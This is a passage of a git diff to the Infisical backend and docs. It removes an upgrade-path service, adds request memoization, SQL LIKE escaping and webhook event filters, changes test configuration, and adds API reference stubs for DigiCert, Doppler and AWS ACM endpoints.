throw new Error(`GitHub releases unavailable: ${error instanceof Error ? 
error.message : "Unknown error"}`); - } - }; - - const getUpgradePathConfig = async (): Promise>> => { - return withCache({ - keyStore, - key: UPGRADE_PATH_CONFIG_KEY, - ttlSeconds: UPGRADE_PATH_CONFIG_TTL, - fetcher: async () => { - try { - const yamlPath = path.join(__dirname, "..", "..", "..", "upgrade-path.yaml"); - const resolvedPath = path.resolve(yamlPath); - const expectedBaseDir = path.resolve(__dirname, "..", "..", ".."); - if (!resolvedPath.startsWith(expectedBaseDir)) { - throw new Error("Invalid configuration file path"); - } - - const yamlContent = await readFile(yamlPath, "utf8"); - - if (yamlContent.length > 1024 * 1024) { - throw new Error("Config file too large"); - } - - const config = yaml.load(yamlContent, { schema: yaml.FAILSAFE_SCHEMA }) as UpgradePathConfig; - return config?.versions || {}; - } catch (error) { - if (error instanceof Error && "code" in error && error.code === "ENOENT") { - return {}; - } - throw new Error(`Config load failed: ${error instanceof Error ? 
error.message : "Unknown error"}`); - } - } - }); - }; - - const normalizeVersion = (version: string): string => { - const versionRegex = new RE2(/(\d+\.\d+\.\d+(?:\.\d+)?)/); - const versionMatch = version.match(versionRegex); - if (versionMatch) { - return versionMatch[1]; - } - - if (version.startsWith("infisical/")) { - return version.replace(new RE2(/^infisical\/v?/), "").replace(new RE2(/-[a-zA-Z]+$/), ""); - } - return version.replace(new RE2(/^v/), "").replace(new RE2(/-[a-zA-Z]+$/), ""); - }; - - const validateParams = (params: CalculateUpgradePathParams) => { - const { fromVersion, toVersion } = params; - - versionSchema.parse(fromVersion); - versionSchema.parse(toVersion); - - if (fromVersion === toVersion) { - throw new Error("Versions cannot be identical"); - } - - if (fromVersion.includes("nightly") || toVersion.includes("nightly")) { - throw new Error("Nightly releases are not supported for upgrade path calculation"); - } - - return { fromVersion, toVersion }; - }; - - const calculateUpgradePath = async (params: CalculateUpgradePathParams): Promise => { - const { fromVersion, toVersion } = validateParams(params); - const cacheKey = sanitizeCacheKey(`upgrade-path:${fromVersion}:${toVersion}`); - - return withCache({ - keyStore, - key: cacheKey, - ttlSeconds: UPGRADE_PATH_CACHE_TTL, - fetcher: async () => { - const [releases, config] = await Promise.all([getGitHubReleases(), getUpgradePathConfig()]); - - const cleanFrom = normalizeVersion(fromVersion); - const cleanTo = normalizeVersion(toVersion); - - const compareVersions = (v1: string, v2: string): number => { - const normalize = (v: string) => normalizeVersion(v); - const clean1 = normalize(v1); - const clean2 = normalize(v2); - - const parts1 = clean1.split(".").map(Number); - const parts2 = clean2.split(".").map(Number); - - const maxLength = Math.max(parts1.length, parts2.length); - while (parts1.length < maxLength) parts1.push(0); - while (parts2.length < maxLength) parts2.push(0); - - for (let 
i = 0; i < maxLength; i += 1) { - if (parts1[i] > parts2[i]) return 1; - if (parts1[i] < parts2[i]) return -1; - } - return 0; - }; - - if (compareVersions(cleanFrom, cleanTo) >= 0) { - throw new Error("fromVersion must be older than toVersion"); - } - - const fromIdx = releases.findIndex((r) => normalizeVersion(r.normalizedTagName) === cleanFrom); - const toIdx = releases.findIndex((r) => normalizeVersion(r.normalizedTagName) === cleanTo); - - let upgradePath: FormattedRelease[] = []; - const filteredPath: FormattedRelease[] = []; - - if (fromIdx !== -1 && toIdx !== -1) { - if (fromIdx <= toIdx) throw new Error("Invalid version order"); - upgradePath = releases.slice(toIdx, fromIdx + 1).reverse(); - const [first, last] = [upgradePath[0], upgradePath[upgradePath.length - 1]]; - - filteredPath.push(first); - if (last !== first) filteredPath.push(last); - } - - const breakingChanges: Array<{ version: string; changes: BreakingChange[] }> = []; - const features: Array<{ version: string; name: string; body: string; publishedAt: string }> = []; - let hasDbMigration = false; - - const isVersionInRange = (version: string, fromVer: string, toVer: string): boolean => { - const versionComp = compareVersions(version, fromVer); - const toVersionComp = compareVersions(version, toVer); - return versionComp > 0 && toVersionComp < 0; - }; - - Object.keys(config).forEach((configVersion) => { - const versionConfig = config[configVersion]; - if (versionConfig?.breaking_changes?.length) { - if (isVersionInRange(configVersion, cleanFrom, cleanTo)) { - breakingChanges.push({ - version: configVersion, - changes: versionConfig.breaking_changes - }); - } - } - }); - for (let i = 0; i < upgradePath.length; i += 1) { - const version = upgradePath[i]; - const isFromVersion = normalizeVersion(version.normalizedTagName) === cleanFrom; - - if (!isFromVersion) { - const versionNumber = normalizeVersion(version.tagName); - const possibleKeys = [ - version.tagName, - version.normalizedTagName, - 
versionNumber, - `v${versionNumber}`, - version.tagName.replace(new RE2(/^infisical\//), ""), - version.tagName.replace(new RE2(/^infisical\/v?/), "").replace(new RE2(/-[a-zA-Z]+$/), "") - ]; - - for (const key of possibleKeys) { - const versionConfig = config[key]; - if ( - versionConfig?.db_schema_changes && - typeof versionConfig.db_schema_changes === "string" && - versionConfig.db_schema_changes.trim() - ) { - hasDbMigration = true; - break; - } - } - } - - // Collect release notes and features - if (version.body) { - features.push({ - version: version.tagName, - name: version.name, - body: version.body, - publishedAt: version.publishedAt - }); - } - } - - return { - path: filteredPath.map((r) => ({ - version: r.tagName, - name: r.name, - publishedAt: r.publishedAt, - prerelease: r.prerelease - })), - breakingChanges, - features, - hasDbMigration, - config - }; - } - }); - }; - - return { - getGitHubReleases, - getUpgradePathConfig, - calculateUpgradePath: (fromVersion: string, toVersion: string) => calculateUpgradePath({ fromVersion, toVersion }) - }; -}; diff --git a/backend/src/services/user-engagement/user-engagement-service.ts b/backend/src/services/user-engagement/user-engagement-service.ts index b1467290362..0e33d1e39e1 100644 --- a/backend/src/services/user-engagement/user-engagement-service.ts +++ b/backend/src/services/user-engagement/user-engagement-service.ts @@ -2,6 +2,8 @@ import axios from "axios"; import { getConfig } from "@app/lib/config/env"; import { InternalServerError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "../org/org-dal"; import { TUserDALFactory } from "../user/user-dal"; @@ -16,7 +18,7 @@ export type TUserEngagementServiceFactory = ReturnType { const createUserWish = async (userId: string, orgId: string, text: string) => { const user = await userDAL.findById(userId); - 
const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); const appCfg = getConfig(); if (!appCfg.PYLON_API_KEY) { diff --git a/backend/src/services/user/user-dal.ts b/backend/src/services/user/user-dal.ts index 6de06d6fa4c..145766f1021 100644 --- a/backend/src/services/user/user-dal.ts +++ b/backend/src/services/user/user-dal.ts @@ -13,6 +13,7 @@ import { UsersSchema } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; export type TUserDALFactory = ReturnType; @@ -38,10 +39,10 @@ export const userDALFactory = (db: TDbClient) => { if (searchTerm) { query = query.where((qb) => { void qb - .whereILike("email", `%${searchTerm}%`) - .orWhereILike("firstName", `%${searchTerm}%`) - .orWhereILike("lastName", `%${searchTerm}%`) - .orWhereRaw('lower("username") like ?', `%${searchTerm}%`); + .whereILike("email", `%${sanitizeSqlLikeString(searchTerm)}%`) + .orWhereILike("firstName", `%${sanitizeSqlLikeString(searchTerm)}%`) + .orWhereILike("lastName", `%${sanitizeSqlLikeString(searchTerm)}%`) + .orWhereRaw('lower("username") like ?', `%${sanitizeSqlLikeString(searchTerm)}%`); }); } @@ -91,7 +92,9 @@ export const userDALFactory = (db: TDbClient) => { isGhost: false }) .whereIn(`${TableName.Users}.id`, userIds) - .join(TableName.UserEncryptionKey, `${TableName.Users}.id`, `${TableName.UserEncryptionKey}.userId`); + .leftJoin(TableName.UserEncryptionKey, `${TableName.Users}.id`, `${TableName.UserEncryptionKey}.userId`) + .select(selectAllTableCols(TableName.Users)) + .select(db.ref("publicKey").withSchema(TableName.UserEncryptionKey)); } catch (error) { throw new DatabaseError({ error, name: "Find user enc by user ids batch" }); } diff --git a/backend/src/services/user/user-service.ts b/backend/src/services/user/user-service.ts index 
c998b272621..75351c2bb42 100644 --- a/backend/src/services/user/user-service.ts +++ b/backend/src/services/user/user-service.ts @@ -87,7 +87,7 @@ export const userServiceFactory = ({ await smtpService.sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${userToken}`, recipients: [user.email], substitutions: { code: userToken diff --git a/backend/src/services/webhook/webhook-fns.ts b/backend/src/services/webhook/webhook-fns.ts index 05fa9114ef8..57fd7d464d2 100644 --- a/backend/src/services/webhook/webhook-fns.ts +++ b/backend/src/services/webhook/webhook-fns.ts @@ -7,6 +7,8 @@ import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto/cryptography"; import { NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { ActorType } from "@app/services/auth/auth-type"; @@ -248,91 +250,22 @@ export const getWebhookPayload = (event: TWebhookPayloads) => { } } - const { projectName, projectId, environment, secretPath, type, reminderNote, secretName } = event.payload; - - switch (type) { - case WebhookType.SLACK: - return { - text: "You have a secret reminder", - attachments: [ - { - color: "#E7F256", - fields: [ - { - title: "Project", - value: projectName, - short: false - }, - { - title: "Environment", - value: environment, - short: false - }, - { - title: "Secret Path", - value: secretPath, - short: false - }, - { - title: "Secret Name", - value: secretName, - short: false - }, - { - title: "Reminder Note", - value: reminderNote, - short: false - } - ] - } - ] - }; - case WebhookType.MICROSOFT_TEAMS: - return { - type: "message", - attachments: [ - { - contentType: 
"application/vnd.microsoft.card.adaptive", - contentUrl: null, - content: { - type: "AdaptiveCard", - version: "1.2", - body: [ - { - type: "TextBlock", - size: "Medium", - weight: "Bolder", - text: "You have a secret reminder" - }, - { - type: "FactSet", - facts: [ - { title: "Project", value: projectName || "" }, - { title: "Environment", value: environment }, - { title: "Secret Path", value: secretPath || "" }, - { title: "Reminder Note", value: reminderNote || "" } - ] - } - ] - } - } - ] - }; - case WebhookType.GENERAL: - default: - return { - event: event.type, - project: { - workspaceId: projectId, - projectId, - projectName, - environment, - secretPath, - secretName, - reminderNote - } - }; + if (event.type === WebhookEvents.TestEvent) { + const { projectName, projectId, environment, secretPath } = event.payload; + return { + event: event.type, + project: { + workspaceId: projectId, + projectId, + projectName, + environment, + secretPath + } + }; } + + logger.warn({ event }, "Unhandled webhook event"); + return null; }; export type TFnTriggerWebhookDTO = { @@ -361,15 +294,18 @@ export const fnTriggerWebhook = async ({ auditLogService }: TFnTriggerWebhookDTO) => { const webhooks = await webhookDAL.findAllWebhooks(projectId, environment); - const toBeTriggeredHooks = webhooks.filter( - ({ secretPath: hookSecretPath, isDisabled }) => - !isDisabled && picomatch.isMatch(secretPath, hookSecretPath, { strictSlashes: false }) - ); + const toBeTriggeredHooks = webhooks.filter(({ secretPath: hookSecretPath, isDisabled, filteredEvents }) => { + const isEventSubscribed = !filteredEvents || filteredEvents.length === 0 || filteredEvents.includes(event.type); + + return !isDisabled && picomatch.isMatch(secretPath, hookSecretPath, { strictSlashes: false }) && isEventSubscribed; + }); if (!toBeTriggeredHooks.length) return; logger.info({ environment, secretPath, projectId }, "Secret webhook job started"); let { projectName } = event.payload; if (!projectName) { - const 
project = await projectDAL.findById(event.payload.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(event.payload.projectId), () => + projectDAL.findById(event.payload.projectId) + ); projectName = project.name; } @@ -379,8 +315,9 @@ export const fnTriggerWebhook = async ({ type: event.type, payload: { ...event.payload, type: hook.type, projectName } } as TWebhookPayloads; - - return triggerWebhookRequest(hook, secretManagerDecryptor, getWebhookPayload(formattedEvent)); + const payload = getWebhookPayload(formattedEvent); + if (!payload) return; + return triggerWebhookRequest(hook, secretManagerDecryptor, payload); }) ); diff --git a/backend/src/services/webhook/webhook-service.ts b/backend/src/services/webhook/webhook-service.ts index 90187dda66c..e603f3872f7 100644 --- a/backend/src/services/webhook/webhook-service.ts +++ b/backend/src/services/webhook/webhook-service.ts @@ -3,7 +3,9 @@ import { ForbiddenError } from "@casl/ability"; import { ActionProjectType, TWebhooksInsert } from "@app/db/schemas"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; -import { NotFoundError } from "@app/lib/errors"; +import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { TKmsServiceFactory } from "../kms/kms-service"; @@ -13,9 +15,11 @@ import { TProjectEnvDALFactory } from "../project-env/project-env-dal"; import { TWebhookDALFactory } from "./webhook-dal"; import { decryptWebhookDetails, getWebhookPayload, triggerWebhookRequest } from "./webhook-fns"; import { + SUBSCRIBABLE_WEBHOOK_EVENTS, TCreateWebhookDTO, TDeleteWebhookDTO, TListWebhookDTO, + 
TSubscribableWebhookEvent, TTestWebhookDTO, TUpdateWebhookDTO, WebhookEvents @@ -38,6 +42,18 @@ export const webhookServiceFactory = ({ projectDAL, kmsService }: TWebhookServiceFactoryDep) => { + const subscribableEvents = new Set(SUBSCRIBABLE_WEBHOOK_EVENTS); + + // `eventsFilter` on the API mirrors the DB's `filteredEvents` column: both are the allowlist + // of events that should trigger the webhook. Empty array => no events are filtered out + // (webhook fires on everything subscribable). + const withEventsFilter = (webhook: T) => ({ + ...webhook, + eventsFilter: (webhook.filteredEvents ?? []) + .filter((eventName): eventName is TSubscribableWebhookEvent => subscribableEvents.has(eventName)) + .map((eventName) => ({ eventName })) + }); + const createWebhook = async ({ actor, actorId, @@ -48,7 +64,8 @@ export const webhookServiceFactory = ({ environment, secretPath, webhookSecretKey, - type + type, + eventsFilter }: TCreateWebhookDTO) => { const { permission } = await permissionService.getProjectPermission({ actor, @@ -70,12 +87,16 @@ export const webhookServiceFactory = ({ type: KmsDataKey.SecretManager, projectId }); + + const filteredEvents = eventsFilter?.map((e) => e.eventName) ?? 
[]; + const insertDoc: TWebhooksInsert = { envId: env.id, isDisabled: false, secretPath: secretPath || "/", type, - encryptedUrl: secretManagerEncryptor({ plainText: Buffer.from(webhookUrl) }).cipherTextBlob + encryptedUrl: secretManagerEncryptor({ plainText: Buffer.from(webhookUrl) }).cipherTextBlob, + filteredEvents }; if (webhookSecretKey) { @@ -83,10 +104,18 @@ export const webhookServiceFactory = ({ } const webhook = await webhookDAL.create(insertDoc); - return { ...webhook, projectId, environment: env }; + return { ...withEventsFilter(webhook), projectId, environment: env }; }; - const updateWebhook = async ({ actorId, actor, actorOrgId, actorAuthMethod, id, isDisabled }: TUpdateWebhookDTO) => { + const updateWebhook = async ({ + actorId, + actor, + actorOrgId, + actorAuthMethod, + id, + isDisabled, + eventsFilter + }: TUpdateWebhookDTO) => { const webhook = await webhookDAL.findById(id); if (!webhook) throw new NotFoundError({ message: `Webhook with ID '${id}' not found` }); @@ -100,8 +129,15 @@ export const webhookServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Edit, ProjectPermissionSub.Webhooks); - const updatedWebhook = await webhookDAL.updateById(id, { isDisabled }); - return { ...webhook, ...updatedWebhook }; + const filteredEvents = eventsFilter?.map((e) => e.eventName); + + const updateData = { + ...(isDisabled !== undefined ? { isDisabled } : {}), + ...(filteredEvents !== undefined ? 
{ filteredEvents } : {}) + }; + + const updatedWebhook = await webhookDAL.updateById(id, updateData); + return withEventsFilter({ ...webhook, ...updatedWebhook }); }; const deleteWebhook = async ({ id, actor, actorId, actorAuthMethod, actorOrgId }: TDeleteWebhookDTO) => { @@ -119,7 +155,7 @@ export const webhookServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Delete, ProjectPermissionSub.Webhooks); const deletedWebhook = await webhookDAL.deleteById(id); - return { ...webhook, ...deletedWebhook }; + return withEventsFilter({ ...webhook, ...deletedWebhook }); }; const testWebhook = async ({ id, actor, actorId, actorAuthMethod, actorOrgId }: TTestWebhookDTO) => { @@ -135,7 +171,9 @@ export const webhookServiceFactory = ({ actionProjectType: ActionProjectType.Any }); - const project = await projectDAL.findById(webhook.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(webhook.projectId), () => + projectDAL.findById(webhook.projectId) + ); const { decryptor: secretManagerDecryptor } = await kmsService.createCipherPairWithDataKey({ type: KmsDataKey.SecretManager, projectId: project.id @@ -144,19 +182,23 @@ export const webhookServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Read, ProjectPermissionSub.Webhooks); let webhookError: string | undefined; try { + const payload = getWebhookPayload({ + type: WebhookEvents.TestEvent, + payload: { + projectName: project.name, + projectId: webhook.projectId, + environment: webhook.environment.slug, + secretPath: webhook.secretPath, + type: webhook.type + } + }); + + if (!payload) throw new BadRequestError({ message: "Failed to get webhook payload for test event" }); + await triggerWebhookRequest( webhook, (value) => secretManagerDecryptor({ cipherTextBlob: value }).toString(), - getWebhookPayload({ - type: "test" as WebhookEvents.SecretModified, - payload: { - projectName: project.name, - projectId: 
webhook.projectId, - environment: webhook.environment.slug, - secretPath: webhook.secretPath, - type: webhook.type - } - }) + payload ); } catch (err) { webhookError = (err as Error).message; @@ -166,7 +208,7 @@ export const webhookServiceFactory = ({ lastStatus: isSuccess ? "success" : "failed", lastRunErrorMessage: isSuccess ? null : webhookError }); - return { ...webhook, ...updatedWebhook }; + return withEventsFilter({ ...webhook, ...updatedWebhook }); }; const listWebhooks = async ({ @@ -197,7 +239,7 @@ export const webhookServiceFactory = ({ return webhooks.map((w) => { const { url } = decryptWebhookDetails(w, (value) => secretManagerDecryptor({ cipherTextBlob: value }).toString()); return { - ...w, + ...withEventsFilter(w), url }; }); diff --git a/backend/src/services/webhook/webhook-types.ts b/backend/src/services/webhook/webhook-types.ts index 7de8473c9ce..16ccdc44e79 100644 --- a/backend/src/services/webhook/webhook-types.ts +++ b/backend/src/services/webhook/webhook-types.ts @@ -8,11 +8,13 @@ export type TCreateWebhookDTO = { webhookUrl: string; webhookSecretKey?: string; type: string; + eventsFilter?: { eventName: TSubscribableWebhookEvent }[]; } & TProjectPermission; export type TUpdateWebhookDTO = { id: string; isDisabled?: boolean; + eventsFilter?: { eventName: TSubscribableWebhookEvent }[]; } & Omit; export type TTestWebhookDTO = { @@ -36,11 +38,14 @@ export enum WebhookType { export enum WebhookEvents { SecretModified = "secrets.modified", - SecretReminderExpired = "secrets.reminder-expired", SecretRotationFailed = "secrets.rotation-failed", TestEvent = "test" } +export const SUBSCRIBABLE_WEBHOOK_EVENTS = [WebhookEvents.SecretModified, WebhookEvents.SecretRotationFailed] as const; + +export type TSubscribableWebhookEvent = (typeof SUBSCRIBABLE_WEBHOOK_EVENTS)[number]; + type TWebhookSecretModifiedEventPayload = { type: WebhookEvents.SecretModified; payload: { @@ -54,36 +59,33 @@ type TWebhookSecretModifiedEventPayload = { }; }; -type 
TWebhookSecretReminderEventPayload = { - type: WebhookEvents.SecretReminderExpired; +type TWebhookSecretRotationFailedEventPayload = { + type: WebhookEvents.SecretRotationFailed; + payload: { + rotationName?: string; projectName?: string; projectId: string; environment: string; secretPath?: string; + triggeredManually?: boolean; + errorMessage?: string; type?: string | null; - secretName: string; - secretId: string; - reminderNote?: string | null; }; }; -type TWebhookSecretRotationFailedEventPayload = { - type: WebhookEvents.SecretRotationFailed; - +type TWebhookTestEventPayload = { + type: WebhookEvents.TestEvent; payload: { - rotationName?: string; projectName?: string; projectId: string; environment: string; secretPath?: string; - triggeredManually?: boolean; - errorMessage?: string; type?: string | null; }; }; export type TWebhookPayloads = | TWebhookSecretModifiedEventPayload - | TWebhookSecretReminderEventPayload - | TWebhookSecretRotationFailedEventPayload; + | TWebhookSecretRotationFailedEventPayload + | TWebhookTestEventPayload; diff --git a/backend/tsconfig.json b/backend/tsconfig.json index db076a30d67..c79668ce7e0 100644 --- a/backend/tsconfig.json +++ b/backend/tsconfig.json @@ -22,6 +22,8 @@ "moduleResolution": "Node", "allowSyntheticDefaultImports": true, "skipLibCheck": true, + "incremental": true, + "tsBuildInfoFile": "./.cache/tsconfig.tsbuildinfo", "baseUrl": ".", "paths": { "@app/*": ["./src/*"], diff --git a/backend/upgrade-path.yaml b/backend/upgrade-path.yaml deleted file mode 100644 index 4ccb7e7752a..00000000000 --- a/backend/upgrade-path.yaml +++ /dev/null @@ -1,26 +0,0 @@ -# Upgrade Path Configuration File -# -# This file defines breaking changes and database migration information for Infisical versions. -# Used by the upgrade path tool to help users understand what changes are required between versions. 
-# -# Expected format: -# versions: -# "version_key": # Can be "v1.2.3", "1.2.3", or "infisical/v1.2.3-postgres" -# breaking_changes: # Optional: list of breaking changes for this version -# - title: "Short descriptive title" -# description: "Detailed description of what changed" -# action: "Specific steps users need to take" -# db_schema_changes: "Optional: Description of database changes and migration details" -# notes: "Optional: Additional notes or important information about this version" -# -# Example: -# versions: -# "v1.2.3": -# breaking_changes: -# - title: "API Endpoint Changes" -# description: "Authentication endpoints have been restructured" -# action: "Update all API calls to use new /auth/v2/ endpoints" -# db_schema_changes: "Major schema restructuring with table reorganization. Extended migration time: 3 minutes." -# notes: "Critical update requiring maintenance window. Test thoroughly before production deployment." - -versions: \ No newline at end of file diff --git a/backend/vitest.e2e.config.mts b/backend/vitest.e2e.config.mts index c9f7a8e1c04..569a02b1f74 100644 --- a/backend/vitest.e2e.config.mts +++ b/backend/vitest.e2e.config.mts @@ -13,12 +13,12 @@ export default defineConfig({ }, environment: "./e2e-test/vitest-environment-knex.ts", include: ["./e2e-test/**/*.spec.ts"], - pool: "threads", + pool: "forks", poolOptions: { - threads: { - minThreads: 1, - maxThreads: 1, - singleThread: true + forks: { + singleFork: true, + minForks: 1, + maxForks: 1 } }, fileParallelism: false, diff --git a/docker-compose.e2e-dbs.yml b/docker-compose.e2e-dbs.yml index 41f542207e7..2406cdfa3bf 100644 --- a/docker-compose.e2e-dbs.yml +++ b/docker-compose.e2e-dbs.yml @@ -131,12 +131,15 @@ services: image: postgres:10.12 platform: linux/amd64 container_name: postgres-10.12 + command: ["postgres", "-c", "password_encryption=scram-sha-256"] ports: - "5435:5432" environment: - POSTGRES_DB=postgres-test - POSTGRES_USER=postgres-test - POSTGRES_PASSWORD=postgres-test + 
- POSTGRES_HOST_AUTH_METHOD=scram-sha-256 + - POSTGRES_INITDB_ARGS=--auth-host=scram-sha-256 --auth-local=scram-sha-256 volumes: - postgres-data-10.12:/var/lib/postgresql/data restart: unless-stopped diff --git a/docs/api-reference/endpoints/app-connections/digicert/available.mdx b/docs/api-reference/endpoints/app-connections/digicert/available.mdx new file mode 100644 index 00000000000..0a5b28f4c1f --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/available.mdx @@ -0,0 +1,4 @@ +--- +title: "Available" +openapi: "GET /api/v1/app-connections/digicert/available" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/create.mdx b/docs/api-reference/endpoints/app-connections/digicert/create.mdx new file mode 100644 index 00000000000..36f46586020 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/create.mdx @@ -0,0 +1,8 @@ +--- +title: "Create" +openapi: "POST /api/v1/app-connections/digicert" +--- + + + Check out the configuration docs for [DigiCert Connections](/integrations/app-connections/digicert) to learn how to obtain the required credentials. 
+ diff --git a/docs/api-reference/endpoints/app-connections/digicert/delete.mdx b/docs/api-reference/endpoints/app-connections/digicert/delete.mdx new file mode 100644 index 00000000000..2ab9f883826 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v1/app-connections/digicert/{connectionId}" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/get-by-id.mdx b/docs/api-reference/endpoints/app-connections/digicert/get-by-id.mdx new file mode 100644 index 00000000000..650210110f0 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/get-by-id.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by ID" +openapi: "GET /api/v1/app-connections/digicert/{connectionId}" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/get-by-name.mdx b/docs/api-reference/endpoints/app-connections/digicert/get-by-name.mdx new file mode 100644 index 00000000000..5e0371fbb7e --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/get-by-name.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by Name" +openapi: "GET /api/v1/app-connections/digicert/connection-name/{connectionName}" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/list.mdx b/docs/api-reference/endpoints/app-connections/digicert/list.mdx new file mode 100644 index 00000000000..de2e45df013 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v1/app-connections/digicert" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/update.mdx b/docs/api-reference/endpoints/app-connections/digicert/update.mdx new file mode 100644 index 00000000000..7152b512f94 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/update.mdx @@ -0,0 +1,8 @@ +--- +title: "Update" +openapi: "PATCH /api/v1/app-connections/digicert/{connectionId}" +--- + + + Check out the 
configuration docs for [DigiCert Connections](/integrations/app-connections/digicert) to learn how to obtain the required credentials. + diff --git a/docs/api-reference/endpoints/app-connections/doppler/available.mdx b/docs/api-reference/endpoints/app-connections/doppler/available.mdx new file mode 100644 index 00000000000..90aec1ff751 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/available.mdx @@ -0,0 +1,4 @@ +--- +title: "Available" +openapi: "GET /api/v1/app-connections/doppler/available" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/create.mdx b/docs/api-reference/endpoints/app-connections/doppler/create.mdx new file mode 100644 index 00000000000..aa558b337af --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/create.mdx @@ -0,0 +1,9 @@ +--- +title: "Create" +openapi: "POST /api/v1/app-connections/doppler" +--- + + + Check out the configuration docs for [Doppler Connections](/integrations/app-connections/doppler) to learn how to obtain + the required credentials. 
+ diff --git a/docs/api-reference/endpoints/app-connections/doppler/delete.mdx b/docs/api-reference/endpoints/app-connections/doppler/delete.mdx new file mode 100644 index 00000000000..2fb8da4786b --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v1/app-connections/doppler/{connectionId}" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/get-by-id.mdx b/docs/api-reference/endpoints/app-connections/doppler/get-by-id.mdx new file mode 100644 index 00000000000..1f2f140aa89 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/get-by-id.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by ID" +openapi: "GET /api/v1/app-connections/doppler/{connectionId}" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/get-by-name.mdx b/docs/api-reference/endpoints/app-connections/doppler/get-by-name.mdx new file mode 100644 index 00000000000..a613966c9e5 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/get-by-name.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by Name" +openapi: "GET /api/v1/app-connections/doppler/connection-name/{connectionName}" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/list.mdx b/docs/api-reference/endpoints/app-connections/doppler/list.mdx new file mode 100644 index 00000000000..95dfcfd9dc1 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v1/app-connections/doppler" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/update.mdx b/docs/api-reference/endpoints/app-connections/doppler/update.mdx new file mode 100644 index 00000000000..2155946854b --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/update.mdx @@ -0,0 +1,9 @@ +--- +title: "Update" +openapi: "PATCH /api/v1/app-connections/doppler/{connectionId}" +--- + + + Check out the configuration docs 
for [Doppler Connections](/integrations/app-connections/doppler) to learn how to obtain + the required credentials. + diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/create.mdx b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/create.mdx new file mode 100644 index 00000000000..fcdc9d688eb --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/create.mdx @@ -0,0 +1,4 @@ +--- +title: "Create" +openapi: "POST /api/v1/cert-manager/ca/aws-acm-public-ca" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/delete.mdx b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/delete.mdx new file mode 100644 index 00000000000..20ac30310d9 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v1/cert-manager/ca/aws-acm-public-ca/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/list.mdx b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/list.mdx new file mode 100644 index 00000000000..296343acf23 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v1/cert-manager/ca/aws-acm-public-ca" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/read.mdx 